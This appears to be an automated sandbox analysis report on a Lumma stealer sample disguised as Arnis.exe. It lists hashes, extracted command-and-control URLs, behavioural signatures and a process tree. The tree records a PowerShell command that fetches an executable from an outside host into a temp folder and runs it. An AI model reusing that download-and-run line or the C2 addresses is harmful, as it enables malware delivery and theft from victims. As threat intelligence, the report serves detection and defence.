Overview
overview
10Static
static
3Arnis.exe
windows10-2004-x64
10Qt5Gui.dll
windows7-x64
3Qt5Gui.dll
windows10-2004-x64
3Qt5Svg.dll
windows7-x64
3Qt5Svg.dll
windows10-2004-x64
3args.js
windows7-x64
3args.js
windows10-2004-x64
3iviewers.dll
windows7-x64
3iviewers.dll
windows10-2004-x64
10main.js
windows7-x64
3main.js
windows10-2004-x64
3ssleay32.dll
windows7-x64
3ssleay32.dll
windows10-2004-x64
3world_editor.js
windows7-x64
3world_editor.js
windows10-2004-x64
3Analysis
-
max time kernel
95s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-01-2025 00:03
Static task
static1
Behavioral task
behavioral1
Sample
Arnis.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
Qt5Gui.dll
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
Qt5Gui.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
Qt5Svg.dll
Resource
win7-20241010-en
Behavioral task
behavioral5
Sample
Qt5Svg.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
args.js
Resource
win7-20240708-en
Behavioral task
behavioral7
Sample
args.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
iviewers.dll
Resource
win7-20240903-en
Behavioral task
behavioral9
Sample
iviewers.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
main.js
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
main.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
ssleay32.dll
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
ssleay32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
world_editor.js
Resource
win7-20240729-en
Behavioral task
behavioral15
Sample
world_editor.js
Resource
win10v2004-20241007-en
General
-
Target
Arnis.exe
-
Size
201KB
-
MD5
2696d944ffbef69510b0c826446fd748
-
SHA1
e4106861076981799719876019fe5224eac2655c
-
SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
-
SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
SSDEEP
3072:gyOSSX7XA5RwkP10/Cg+ufLLobyT9S9jHkQPEZS0bGAPo:tEXjA5yBF+ma9jHfPITGb
Malware Config
Extracted
lumma
https://cloudewahsj.shop/api
https://rabidcowse.shop/api
https://noisycuttej.shop/api
https://tirepublicerj.shop/api
https://framekgirus.shop/api
https://wholersorie.shop/api
https://abruptyopsn.shop/api
https://nearycrepso.shop/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 14 4008 powershell.exe 16 4008 powershell.exe 19 4008 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x0007000000023c9e-32.dat net_reactor behavioral1/memory/3096-36-0x0000000000980000-0x00000000009E2000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Arnis.exe -
Executes dropped EXE 2 IoCs
pid Process 3096 qnkanmxi.4d4.exe 2220 qnkanmxi.4d4.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3096 set thread context of 2220 3096 qnkanmxi.4d4.exe 95 -
pid Process 4008 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process 3532 3096 WerFault.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Arnis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qnkanmxi.4d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qnkanmxi.4d4.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4008 powershell.exe 4008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4008 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4528 Arnis.exe 4528 Arnis.exe 4528 Arnis.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4528 wrote to memory of 4008 4528 Arnis.exe 83 PID 4528 wrote to memory of 4008 4528 Arnis.exe 83 PID 4528 wrote to memory of 4008 4528 Arnis.exe 83 PID 4528 wrote to memory of 3096 4528 Arnis.exe 93 PID 4528 wrote to memory of 3096 4528 Arnis.exe 93 PID 4528 wrote to memory of 3096 4528 Arnis.exe 93 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95 PID 3096 wrote to memory of 2220 3096 qnkanmxi.4d4.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\Arnis.exe"C:\Users\Admin\AppData\Local\Temp\Arnis.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'https://moolaplace.com/arnireq.exe' -OutFile 'C:\Windows\Temp\qnkanmxi.4d4.exe'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
C:\Windows\Temp\qnkanmxi.4d4.exe"C:\Windows\Temp\qnkanmxi.4d4.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\Temp\qnkanmxi.4d4.exe"C:\Windows\Temp\qnkanmxi.4d4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 8003⤵
- Program crash
PID:3532
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3096 -ip 30961⤵PID:912
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
358KB
MD5e195a398efc6cf3b170399418eede5dc
SHA1b2a5786515b12d60c8035c8129123eccb9324d12
SHA2567b8b7aa7fa8fc7a79ca28976893b21f9c8760fad2bb0bbffa10f97101431e19b
SHA5125f24fb8836ce26cb8aacac32b1a16e9ae5cd2ab4a11b4aa6b54e38df697d51045cff962193b47d628ab3abdd2057952d8edb96946cf1349890df36774e3c9210